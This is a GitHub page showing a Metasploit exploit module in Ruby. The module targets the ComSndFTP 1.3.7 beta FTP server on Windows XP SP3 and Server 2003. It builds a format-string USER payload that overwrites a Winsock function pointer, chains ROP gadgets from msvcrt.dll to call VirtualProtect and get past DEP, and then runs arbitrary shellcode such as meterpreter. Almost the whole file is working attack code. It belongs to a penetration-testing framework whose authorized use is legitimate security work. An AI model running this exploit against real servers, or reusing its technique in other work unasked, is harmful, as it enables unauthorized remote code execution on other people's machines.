-
Notifications
You must be signed in to change notification settings - Fork 13.9k
/
comsnd_ftpd_fmtstr.rb
197 lines (177 loc) · 6.39 KB
/
comsnd_ftpd_fmtstr.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',
'Description' => %q{
This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
crafted format string specifier as a username. The crafted username is sent to to the server to
overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
The SEH exit function is preferred so that the administrators are not left with an unhandled
exception message. When using the meterpreter payload, the process will never die, allowing
for continuous exploitation.
},
'Author' =>
[
'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc
'rick2600 <rick2600[at]corelan.be>', # msf module (target XP)
'mr_me <mr_me[at]corelan.be>', # msf module (target 23k)
'corelanc0d3r <peter.ve[at]corelan.be>' # msf module
],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'References' =>
[
# When a DoS is NOT a DoS
[ 'OSVDB', '82798'],
[ 'EDB', '19024']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh'
},
'Platform' => ['win'],
'Privileged' => false,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
'DisableNops' => 'True'
},
'Targets' =>
[
[
'Windows XP SP3 - English',
{
'Functionpointer' => 0x71AC4050, # winsock pointer
'Functionaddress' => 0x71AB2636, # the repair address
'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
'Pad' => 568
}
],
[
'Windows Server 2003 - English',
{
'Functionpointer' => 0x71C14044, # winsock pointer
'Functionaddress' => 0x71C02661, # the repair address
'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
'Pad' => 568
}
]
],
'DisclosureDate' => 'Jun 08 2012'))
register_options(
[
Opt::RPORT(21),
], self.class)
end
def check
connect
banner = sock.get_once || ""
disconnect
validate = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
validate << "\xf1\xc6\xf7\x21\x0d\x0a"
if banner.to_s == validate
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def junk(n=4)
return rand_text_alpha(n).unpack("V").first
end
def exploit
rop = ''
if target.name =~ /Server 2003/
# C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959
rop = [
0x77be3adb, # pop eax ; retn
0x77ba1114, # <- *&VirtualProtect()
0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
junk,
0x77bb0c86, # xchg eax,esi ; retn
0x77be3adb, # pop eax ; retn
0xFFFFFBFF, # dwSize
0x77BAD64D, # neg eax ; pop ebp ; retn
junk,
0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
0x77bbfc02, # pop ecx ; retn
0x77bef001, # ptr that is w+
0x77bd8c04, # pop edi ; retn
0x77bd8c05, # retn
0x77be3adb, # pop eax ; retn
0xFFFFFFC0, # flNewProtect
0x77BAD64D, # neg eax ; pop ebp ; retn
0x77be2265, # ptr to 'push esp ; ret'
0x77BB8285, # xchg eax,edx ; retn
0x77be3adb, # pop eax ; retn
0x90909090, # nops
0x77be6591, # pushad ; add al,0ef ; retn
].pack("V*")
elsif target.name =~ /XP SP3/
# C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512
rop = [
0x77C21D16, # pop eax ; retn
0x77C11120, # <- *&VirtualProtect()
0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
junk,
0x77C21891, # pop esi ; retn
0x77C5D010, # ptr that is w+
0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
0x77C21D16, # pop eax ; retn
0xFFFFFBFF, # dwSize
0x77C1BE18, # neg eax ; pop ebp ; retn
junk,
0x77C2362C, # pop ebx ; retn
0x77C5D010, # ptr that is w+
0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
0x77C1F519, # pop ecx ; retn
0x77C5D010, # ptr that is w+
0x77C23B47, # pop edi ; retn
0x77C23B48, # retn
0x77C21D16, # pop eax ; retn
0xFFFFFFC0, # flNewProtect
0x77C1BE18, # neg eax ; pop ebp ; retn
0x77C35459, # ptr to 'push esp ; ret'
0x77C58FBC, # xchg eax,edx ; retn
0x77C21D16, # pop eax ; retn
0x90909090, # nops
0x77C567F0, # pushad ; add al,0ef ; retn
].pack("V*")
end
stage1 = %Q{
mov eax, #{target['Functionpointer']}
mov ecx, #{target['Functionaddress']}
mov [eax], ecx
}
offset_wp = rand_text_alphanumeric(1)
pivot = target['Pivot']
offset = target['Pad'] + rop.length + stage1.length + payload.encoded.length
attackstring = rand_text_alphanumeric(7)
attackstring << [target['Functionpointer']].pack('V')
attackstring << "%#{pivot}x" # special pointer to our pivot
attackstring << "%p" * 208 + "#{offset_wp }%n" # format specifiers to read and write the function pointer
attackstring << rand_text_alphanumeric(target['Pad'])
attackstring << rop
attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string
attackstring << payload.encoded
attackstring << rand_text_alphanumeric(2000 - offset)
attackstring << "\r\n"
sploit = "USER #{attackstring}\r\n"
print_status("Triggering overflow...")
connect
sock.get_once(1024)
sock.put(sploit)
select(nil, nil, nil, 2)
handler
disconnect
end
end